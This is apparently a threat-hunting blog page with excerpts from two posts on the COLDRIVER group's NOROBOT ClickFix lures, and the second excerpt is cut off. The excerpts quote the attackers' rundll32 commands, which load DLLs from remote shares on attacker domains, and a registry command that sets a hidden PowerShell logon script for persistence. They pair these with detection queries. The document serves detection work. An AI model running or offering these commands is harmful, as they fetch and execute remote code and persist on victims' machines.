Posts

Showing posts with the label coldriver

294. Hunting for Suspicious DLL Export Functions

Image
Hello everyone! I noted a few times that one of my favorite threat hunting targets is rundll32.exe . And there's another interesting point about it - export functions. In many cases DLL export functions may be very interesting and suspicious, and may be worth to be documented. Let's look at an example -  NOROBOT . The adversary delivered it via ClickFix technique. The victim should have executed the following command: rundll32.exe \\inspectguarantee[.]org\check\iamnotarobot.dll,humanCheck As you can see, it has a very interesting export function name - " humanCheck ". Why not to use it to build a query? event_type: "processcreatewin" AND proc_file_path: "rundll32.exe" AND cmdline: "humancheck" See you tomorrow!

268. Hunting for COLDRIVER

Image
Hello everyone! Today we'll look into another great report by Zscaler. This time it's on COLDRIVER (also known as Star Blizzard, Callisto, and UNC4057). And it's full of detection and hunting ideas! The threat actor added ClickFix to their arsenal, but leveraged rundll32.exe instead of common cmd.exe , powershell.exe and mshta.exe : rundll32.exe \\captchanom[.]top\check\machinerie.dll,verifyme Here we can hunt for rundll32.exe executing DLLs located on .top (you can experiment with others, of course) domains (and yes, I love hunting for rundll32.exe abuse): event_type: "processcreatewin" AND proc_file_path: "rundll32.exe" AND cmdline: *top* The threat actors used Logon Script (T1037.001) for persistence: reg add "HKCU\Environment" /v UserInitMprLogonScript /t REG_SZ /d "powershell -WindowStyle Hidden -ep bypass \"%APPDATA%\Microsoft\Windows\FvFLcsr23.ps1\" \"7eHgxjgbBs3gHdkgx9AsRC\"" /f% And yes, it's ano...